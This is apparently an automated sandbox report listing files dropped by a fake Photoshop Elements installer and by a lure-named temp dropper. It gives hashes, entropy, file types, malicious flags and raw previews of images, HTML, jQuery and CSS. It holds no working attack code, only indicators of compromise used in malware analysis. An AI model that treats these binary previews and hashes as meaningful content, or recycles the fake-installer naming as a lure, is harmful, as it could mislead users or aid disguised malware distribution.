                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:46-07:00" xmp:MetadataDate="2023-06-08T09:43:46-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:3f70fe00-776c-4639-9501-80a213adaf5c" xmpMM:DocumentID="adobe:docid:photoshop:403eff47-3e40-d943-b1f3-cd79be874dc9" xmpMM:OriginalDocumentID="xmp.did:6
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):222420
                                                                                                      Entropy (8bit):7.994042748653122
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:jcz9b7RCO9pmE6Ko+87V5lIjrYR3XrwPaQOtI:jcz9nRChwQ55lAosPaptI
                                                                                                      MD5:D428286039502448A467942D6F20772E
                                                                                                      SHA1:412C3EA49EC6BC7EB0C52D778BC4E95E33201D88
                                                                                                      SHA-256:61DA52D1E93196300E6E2DD189CB3F5BD5389A42CEA0903139E4D2F475CB6B2E
                                                                                                      SHA-512:0022EB09B113D0B5B584B08458A1D2FB6381758CC94675D98F3EB118D48B4B4444477371D5C9D82C89F8027874D8B70F533327716E27E2395FCF19E8F102EDA4
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:47-07:00" xmp:MetadataDate="2023-06-08T09:43:47-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:7ac500a4-b904-4744-8465-5d68e86d59d2" xmpMM:DocumentID="adobe:docid:photoshop:a720b7d4-b284-e144-a70b-eee0bf83c698" xmpMM:OriginalDocumentID="xmp.did:4
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 890 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):553301
                                                                                                      Entropy (8bit):7.995654160787874
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:epoqx1wWl8qxmvXfTrc+toMT06H+rI6k2S+LmWJXEUon:Ooqx1kqGX/DLXzhEmG0Vn
                                                                                                      MD5:3ED1397092BD3EAFDFE71335BF5F5E3C
                                                                                                      SHA1:9D1DBE45E4F1F12A0642EED50F91FDC8DA3B888A
                                                                                                      SHA-256:8276F8BE890ABEEC09B6AAB522F7B45F60ABE2BFA51FEC333924537BABF9D9E3
                                                                                                      SHA-512:5DBE0A094498615CD944F7A16888E4603DC357779A9CA8D8DDEBDCF8AD8C72106EFFD316E3078037EBF254245D2C25BEA5A3ADFE773CCB783090206EE9D75A78
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR...z..........Ay.....sBIT....|.d... .IDATx^...dWy..U.'.(."(#....H(..&K...0a...m..,^.X..Y2.......QB $!..(.Q...=.9W......)uuu....s...U..{.{..~.$.......@@ ...........@@ ...3.$..3}.............@@ ........@..@.........@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..@..X..........@@ ..........@............@@ ........s..]N......04' ..............@"....Z.......D......^.i.r@ ..........9.@5bW..9.FhL@`/A`........_h###V($..LX"..d2.....g..Y...($-...`9
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (484), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4509
                                                                                                      Entropy (8bit):5.497933185923274
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:hSq8uLYbW1sfMUKJpmtqunn4TJPxqfR7vzf:sX+QQaym6CZ7
                                                                                                      MD5:348352BAA22F54466691B8673B6B6C93
                                                                                                      SHA1:5F6606EA02606FEC542690E80273AA5FFAAFF0AE
                                                                                                      SHA-256:39E5810ACB9489EDF3918ADB3746255866975AFC1F6AB65FFC2BA598C505D2B1
                                                                                                      SHA-512:F2749AE136CA182DF2D0FE31DDED8069D8AD915AA8BEEC02871A675BE8F0666042B5E91F4DB39F751A4AECB240DCDB1A23377EB4107EA77FB5B0A478090135D3
                                                                                                      Malicious:false
                                                                                                      Preview:<!DOCTYPE html>..<html>..<head>...<meta charset="UTF-8">..<title>PSE installer slideshow</title>..<meta name="viewport" content="width=device-width, initial-scale=1">...<link href="https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?unicode=AAAIKgAAAAeBbOxmgCK-MdR34PEMRZ1Tp9CwbKr4ekaVGobt7iigFXgNffcWrPD_gJGcqz4xm1ZHNxQko2H768-q_TQrRlbWnqbTqCadCnzX6SMLdOBM8TwhjODtXWG7u6eXofuwSXdUrzPUKbfKpbP6PlW4uDR0-6_uxx_z2oPZb3FtGAlPVL4uieBXWVbsZ4asc6c4x6xRdBebJFZn5j3znnW2M2LSxdS-vENrhYjQcGpEJr10KhGz9SJjgjddqPchFHp-i9IDPTig_GvFioJvHs2SJsCuNUs-qApsimZXK9dDrVIGetZ_W6VrfDwKAGEfm-zn0HbNFllfrTmy7jrTddn22c9_90qThgAAAE4&features=ALL&v=3" rel="stylesheet">...<link rel="stylesheet" href="css/styles.css">......<style>.....html {....background-color: #fff;.....}..* {box-sizing: border-box;}..body {...margin:0px;}...mySlides {opacity: 0; position: absolute; transition: all 1s;}..img {vertical-align: middle;}..../* Slideshow container */...slideshow-container {.. max-width: 445px;.. position: relativ
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (65482), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):93637
                                                                                                      Entropy (8bit):5.292996107428883
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                      MD5:E1288116312E4728F98923C79B034B67
                                                                                                      SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                      SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                      SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                      Malicious:false
                                                                                                      Preview:/*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):0.8146887695758652
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:2JIB/wUKUKQncEmYRTwh0AYLpipLpDLpe:sUK+RLpipLpDLp
                                                                                                      MD5:00B07B11473DE6BA9C373B1848B21098
                                                                                                      SHA1:2594A920342C0329922C90CE66A77866ACEE0E57
                                                                                                      SHA-256:E97DF50A254AC155DC496C1DEAD4A67AC971B929548840F5BC5E374B7FC507E6
                                                                                                      SHA-512:D9EFF0A1C84526DE9A62EA89AB86FE18FDE81171303C4D816D14E4612142C652B6785F6F5253E7E7801E2A83B086C8B51930A1F9D5C7D7C967850E64E2648A0F
                                                                                                      Malicious:false
                                                                                                      Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5df37335, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1310720
                                                                                                      Entropy (8bit):0.7899999187451817
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii
                                                                                                      MD5:0C1894DCD0576A580EC273F9EDF0E524
                                                                                                      SHA1:9232587E7AA2FB8B2659B198A1173817A790BADC
                                                                                                      SHA-256:FFA5571AC8A9155366B9C8F598EC540234F37A16ADCB4F1F3EF79CE1653B88BF
                                                                                                      SHA-512:C3EA23B3AC9ADA35B6BE81BE72278934CEE2CDB7C36B578C6401A01B50CC7960EB88AB183FA3083696CFF6160F7F41338F4C15DB876C9383D0B52F5DF2887718
                                                                                                      Malicious:false
                                                                                                      Preview:].s5... ...............X\...;...{......................0.`.....42...{5.#5...|I.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................T..#5...|i..................z..#5...|I..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16384
                                                                                                      Entropy (8bit):0.08219266610581169
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:jyYexio6gGqt/57Dek3JYFFMAllEqW3l/TjzzQ/t:jyzxL6gHR3tYFKAmd8/
                                                                                                      MD5:B3F031C60EE15767B994CEE74B6BDB5A
                                                                                                      SHA1:D0DAE03146FFBBF879787847F11B10ACBBEA49C1
                                                                                                      SHA-256:70B5E19DC37306E91DB01B2972A92DBCE75BF7F1C6413FC018D8578B46B6669A
                                                                                                      SHA-512:2C8EB067585F1EDED28EA168626057ED6B2599A0A1C6BF1C7DC2E21FA7CD1BCA3E26E233F2EA09FA5520F05FA0D65E689861E532CDFAC95B16A0C10CE1EF3E61
                                                                                                      Malicious:false
                                                                                                      Preview:.\.......................................;...{..#5...|I.42...{5.........42...{5.42...{5...Y.42...{59.................z..#5...|I.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):38
                                                                                                      Entropy (8bit):3.5471593428359363
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:KxWCdCTjI1dmIq2pkTYn:KxWCdCv0mSaYn
                                                                                                      MD5:56D08B9E03929A3E469FA1D986F4BACD
                                                                                                      SHA1:E0CCCA71EB4E81166156D41640CA4D05E079F0A3
                                                                                                      SHA-256:16F4816099F13DE4672B65AF02610E4E6FCC7F22EA678879E5B15AE789D8F8DF
                                                                                                      SHA-512:7F6ECAB4C47EF6D6F1A41F9440828AE07F0EA802739542CCDAF77CE67EF5B84607D1F6235D46D6D53B74268EF243F01E11D6EE01ABAEA99F28BFAC5707F82DB6
                                                                                                      Malicious:false
                                                                                                      Preview:{042352A1-4F6F-463A-AC3E-1662454565A6}
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37064
                                                                                                      Entropy (8bit):7.971992903016411
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:hCy8Oi1BjTqoAPGFT3K03Y9sTGwuuQ4bV7V5lrJgNimWE8+a:V8vBvsGB3NeduQ4bHDFC38r
                                                                                                      MD5:A562A2292F195C97C250581ABFC43411
                                                                                                      SHA1:B00AFCCCFB1CD3E8CAA9BC33A2C14D64B0C10A16
                                                                                                      SHA-256:B48B30AF5CE18C96128BFFF9D2755C7932A1F32ADC66F68322F7DD505DB9626F
                                                                                                      SHA-512:B2984E16532BEC98918EB6ABBF619FECE09D50E4F2ADB1AB3860B2CAD9FB2030955BDAA09CC8D9D0778753F7F2F864F8B3481C894921F424BDFC27CC13A535E5
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........qv+....B. o.}.0...l.....$.:......z.*....D.@..h..=.87..(..9PG..j.S......t.d*.K..B.f....L:k.*...w.....~.z.[.JD........H.S@..C+...^.....p...A.4W....F......7-_H..s..%.=$.;.!...Q..3..v.=..l..(..Zl.....w....;...W.....7...J.7...L.:@.Wy}.r>....RK..F.........0.."0...*.H.............0..........Dk.md)=..$.3..r......w.O........{._.-%....G....7R=.+..OA.....M~..(.t.(.R.J.."i..L_g..;.+^'..9.#../.T;-W..W_....OIC%..tRT...nB;(.i.w.W..*..^.=..<...K.}..)[$.E...U.t.......?YE.zW.2l..~.....R._...uRI...Qn..[..u.+........T(T/....(..r....qJ.6z..........F....v18..nEGY.8..kK.....".Kt....G....f..|].....\.....B%.......Y._).zeqS.,.W......]$...elu[.B..AX^rv^.21.T?.%..y....w".x..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7326
                                                                                                      Entropy (8bit):7.727942782725483
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:C37oyTIs04q37YgZkUBOoHMdNiP6nCm/9xjvhoRx6x82trRn:YTqU8AoH6n5zloaZN
                                                                                                      MD5:674314F5514D6F7EE43338AC4C765BFF
                                                                                                      SHA1:475BDCF05A8640634D82B60767100CDA5953396D
                                                                                                      SHA-256:03CCCBB22B17080279EA1707C9AB093C59F4F4DD09580C841CFA794CB372228D
                                                                                                      SHA-512:3731724AC6EA813251C12868C4FD6CE1E0E742D6655A9CDF638387A05330374129A261F73F93D06595FCF8A0DD558CE191A2D6D7B21F76FC54FBA2674573355F
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........Z......c.:..k7..O....32.k$H:...Q...a...r>xNa.....c..!....3...s.......w...{.W.&\.MY..OT!....u..}.T-._W.\^.2.8.r.t.e....i7..ug..<..t.4D...V0...X.o..G.@..._H...E....".'.)..x..]B.3....a..o1.Q..F/..m}..h|s=HX.w"..+..>.Q.....\.S.Q~..~.,9..c!.v.3j,....h[.......0.."0...*.H.............0.........bi] ,7.T#}.....L.......J...M.h.!.*ZY...D^....j...1..BaR.B...l...lk....}>#.e.Qy.g..a...r....Y.......j5.m...Z.A.....R<E...E....q/..Y!3.;'..m.L{.O".M.,.t..}.....}|..BjP.k....+...M{.;....E.i...'....k^]8.I...s..^...e.v......BV.Gk0......H.....B.=.]..`.c..p4....j....7.e.N(....].a..:...,..:....X.._.6[h..<...~.......y.b.T....1.N......+.S.../...\..7.m...5.....^.(,..#.1X.
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1181927
                                                                                                      Entropy (8bit):7.997580237306415
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:rq9Lbk1ZSPg10//xALQtigTPnWqHAD/Dzj4ZmM4/wIwIs10XYyyJeSq3IfI+GN1s:6LQPcC0//yLlgTPWqgzDH4ZmZs6XYy8r
                                                                                                      MD5:F265D47475FFD3884329D92DEEFAE504
                                                                                                      SHA1:98C74386481F171B09CB9490281688392EEFBFDD
                                                                                                      SHA-256:C900BA9A2D8318263FD43782EE6FD5FB50BAD78BF0EB2C972B5922C458AF45ED
                                                                                                      SHA-512:4FD27594C459FB1CD94A857BE10F7D1D6216DBF202CD43E8A3FA395A268C72FC5F5C456C9CB314F2220D766AF741DB469C8BB106ACBED419149A44A3B87619F1
                                                                                                      Malicious:false
                                                                                                      Preview:Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........R....H.4.>..gg.n6:...d1.<X.R&..V...5.d..o\%r'y..W....}.Gk!..r.7.*.k.@n..^....[.&......^..>.Su...^"aZ.......>m~.....u+..O.....3$s...ABo..)........4..W.3vp^.'..OF.**........f.u.(o..).f..Yu\\..`.z.c...B.Bb.v..w.........c4r../..d|...&@Wk...W..@......0.."0...*.H.............0..........,.v@....]...<.....n..m.RI..~o.....K..+B/$.).EP....H/..}......$.]....m.Y....P.......&/.Q...@7..`.$M..(-!m...*.H....k.P......E%.(.DvnlS....d....$.|....K.......5.....k?........XG..0.... .m...c3O.......xm.x,.D.duG..F+.. Q!.NJT..&..y..LHng.'.[..._i.Pt.........w...:...q.../J..R1....N..]..b._...]y4..f......@.x..\B..h..8b0...{pi..(.....N=@..V...S..o|d;....j.Kx.A..+.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49120
                                                                                                      Entropy (8bit):0.0017331682157558962
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Ztt:T
                                                                                                      MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                      SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                      SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                      SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                      Malicious:false
                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (985), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):989
                                                                                                      Entropy (8bit):5.0158148026932
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:0E0JYyRuUVsGruT0CpeLm7WaYcosVk7EituMGLaMa:0EvygHT0AeLGW9sWftuMvB
                                                                                                      MD5:8ACB04E01887F879E9E42213AB939C65
                                                                                                      SHA1:BDE3838CB032F27236509AD462467B79E8798761
                                                                                                      SHA-256:A45FAE58FCCA382FC6716FCD451A8D7D981747198E8EB2674DB8788AE6EC0696
                                                                                                      SHA-512:E4AB9B9AE71254DA98FD6B6EDA058891E86CFF064614AE86A21B052716F0BCB2AFAAE8E90C4AF40FC97F4755705C7B20246EDC726631418FBFD533C37D71B672
                                                                                                      Malicious:false
                                                                                                      Preview:<!doctype html><html lang="en"><head><meta charset="UTF-8"><link rel="icon" href="../favicon.ico"><script defer="defer" src="../main.b0672d3a39922f82eec8.js"></script><link href="../styles.edd438b7aa7a327c3ab3.css" rel="stylesheet"></head><body class="spectrum spectrum--lightest spectrum--large"><div class="container"><noscript><div class="spectrum-Body4 toaster">JavaScript is disabled.<br/>Please enable JavaScript and try to sign in again.</div></noscript><div class="container-content"><h1 class="spectrum-Heading2"><strong>Check your browser</strong></h1><div class="spectrum-Body4 mod-top-spaced">We.ve opened a new browser tab for you to sign in. (Once you.ve been authenticated, you will automatically continue here.)</div><div class="footer"><hr class="spectrum-Rule spectrum-Rule--medium mod-bot-spaced"/><div class="spectrum-Body5">If your browser is not responding, <a id="Cancel-Link" href="#" class="spectrum-Link">sign in here</a></div></div></div></div></body></html>
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (65453)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):93688
                                                                                                      Entropy (8bit):5.21686506400035
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:8OjQydyiodEtkCB+uuhQmJ++xAE1e1GCSCk0YQjdmiFC9CUgCGifQrfj7x60ECP0:7jQMtodM+uuzug56dqta5c6fUV4E9j
                                                                                                      MD5:6AB5F87F3C4C7DDEBFD5711E66C58A6C
                                                                                                      SHA1:55BE8A98377540C25CEC30B9A995D53058DF0196
                                                                                                      SHA-256:63BE85C4C16B1D922F38CC01810B0547949531985C6D3360FADB8D07C6AE4E47
                                                                                                      SHA-512:D7C8E71B21B498CC7C1EF57B5AAA04F5A706F6C0799A971C5ADC2D3274F11F077BCF0B83C28B27920FE0874C94107ECD3D0CB281E65E9D0DDE2E8EC289DC72DF
                                                                                                      Malicious:false
                                                                                                      Preview:/*! For license information please see main.b0672d3a39922f82eec8.js.LICENSE.txt */.!function(){var t={479:function(){(function(){"use strict";var t,e;if(!(t=window.location).origin){e=t.protocol+"//"+t.hostname+(t.port?":"+t.port:"");try{Object.defineProperty(t,"origin",{value:e,enumerable:!0})}catch(r){t.origin=e}}}).call(this)}},e={};function r(n){var o=e[n];if(void 0!==o)return o.exports;var i=e[n]={exports:{}};return t[n].call(i.exports,i,i.exports,r),i.exports}r.d=function(t,e){for(var n in e)r.o(e,n)&&!r.o(t,n)&&Object.defineProperty(t,n,{enumerable:!0,get:e[n]})},r.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(t){if("object"==typeof window)return window}}(),r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},function(){"use
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with very long lines (63586)
                                                                                                      Category:modified
                                                                                                      Size (bytes):321167
                                                                                                      Entropy (8bit):5.086458047670212
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:KMGSnbnLAEnB/6n2AT3hHs19U2sRhmL0sUn9TEezt4n4Zl8r:GJkTezta
                                                                                                      MD5:DAD4CA1B663D737D6E8B8F1157A066F6
                                                                                                      SHA1:82FFD15D112DB2DEE16BDD4BD1D7DCA18B1345DA
                                                                                                      SHA-256:510C1AB4834E60ACDD19AA91E627DA2A2EF9C5E5D5377A212F3DB525DFCC3813
                                                                                                      SHA-512:B4C1BD2503F2F8CE6BD1E5319800D9D348ED347CC9B9E413565070BBEB077E6F1C24929D245AB231493C8280C8397822A5E96ED62C5CA19265F6523EA2E56E5A
                                                                                                      Malicious:false
                                                                                                      Preview:/*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}main{display:block}h1{font-size:2em;margin:.67em 0}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}img{border-style:none}button,input,optgroup,select,textarea{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=bu
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):943593
                                                                                                      Entropy (8bit):6.683286371944535
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:jv3J8Stk9f6g3Sw8N+JIIxa6tHq6JtYyYVr7VglM+kT:jG04Pi3NaIjOKuuyYVr7SlbA
                                                                                                      MD5:3F893C500BFCFF220640DB529EB18F37
                                                                                                      SHA1:4D063497249508D0C99D32FE6BFB8223D0A138F0
                                                                                                      SHA-256:26CC7078A0B8FD480708C4CF1B738524FCF24F729B181DDC4DB2F5D38AC1A681
                                                                                                      SHA-512:AEC39D4AD64D1E5D4445EAA6C298C770AFF9F7DC2B6D732C1A744EFB8FF31F1A4C63334A140120D2010A97CAB1020E6850F7E1A9E3509B47685FD9C8E0F86904
                                                                                                      Malicious:false
